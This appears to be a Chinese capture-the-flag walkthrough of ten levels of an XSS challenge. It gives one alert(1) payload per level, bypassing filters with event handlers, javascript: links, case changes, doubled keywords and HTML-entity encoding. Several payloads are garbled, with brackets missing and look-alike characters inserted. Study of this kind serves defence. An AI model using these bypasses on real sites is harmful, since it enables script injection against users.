现在找个网站这么难的吗,网站打开慢原因,做网站不赚钱了,郑州怎样建设公司网站简介
XSS挑战赛#xff0c;里面包含了各种XSS的防御方式和绕过方式#xff0c;好好掌握里面的绕过细节#xff0c;有助于我们更好的去发现XSS漏洞以及XSS的防御。本文更多的是分享解析的细节#xff0c;不是一个标准的答案#xff0c;希望大家在渗透的时候有更多的思维。…简介
XSS挑战赛里面包含了各种XSS的防御方式和绕过方式好好掌握里面的绕过细节有助于我们更好的去发现XSS漏洞以及XSS的防御。本文更多的是分享解析的细节不是一个标准的答案希望大家在渗透的时候有更多的思维。
挑战开始
Level1
通关过程 第一关总的来说比较简单直接先尝试:
payload
scriptalert(1)/scriptLevel2
通关过程
直接尝试payload 查看源码 想办法去逃逸输入框
payload
ascriptalert(1)/scriptLevel3
通关过程
直接尝试 发现没有弹窗审核源码 到这里说明不能再输入标签了所以需要转换思路这个地方标签不行那我们就尝试事件这个地方考虑使用onfocus事件’ οnfοcusalert(1) 这个单引号就是为了闭合value的单引号。
paylaod οnfοcusalert(1)Level4
通关过程
直接尝试 分析源码感觉和第三关思路一致 尝试: οnfοcusalert(1)
payload οnfοcusalert(1)Level5
通关过程
直接尝试 意味着不能输入script标签了换思路用事件 οnfοcusalert(1) 考虑这个地方有没有可能是个黑名单机制呢换不常用的事件 看来过滤的比较讲究那么我们试试逃逸输入框用其他标签来试试 jack 点击通关
payoad
a hrefjavascript:alert(1)jack/aLevel6
通关过程
直接尝试 直接尝试jack 尝试大小写绕过jack
payload
a HrEfjavascript:alert(1)jack/aLevel7
通关过程
直接尝试 双写alert(1) 尝试alert(1) payload
scrscriptiptalert(1)/scscriptriptLevel8
通关过程
直接尝试 看源码 那么伪协议 javascript:alert(1) 这个地方多半对事件也进行了处理双写就不用试了因为没有删除关键字 考虑到unicode是支持所有的编码那么转成这个编码看行不行 所以直接尝试
payload
#106;#97;#118;#97;#115;#99;#114;#105;#112;#116;#58;#97;#108;#101;#114;#116;#40;#49;#41;Level9
通关过程
直接尝试 需要一个合法链接 那么输入javascript:alert(1);//http://www.baidu.com 还是被处理了那么用和8关相同的编码试试 javascript:alert(1)//http://www.baidu.com payload
#106;#97;#118;#97;#115;#99;#114;#105;#112;#116;#58;#97;#108;#101;#114;#116;#40;#49;#41;//http://www.baidu.comLevel10
通关过程
直接尝试 看来被实体化了。看源码 尝试着传递这几个隐藏域的值 构造逃逸t_sorta οnfοcus“alert(1)” 继续构造t_sorta οnfοcus“alert(1)” typetext
payload
t_sorta οnfοcusalert(1) typetext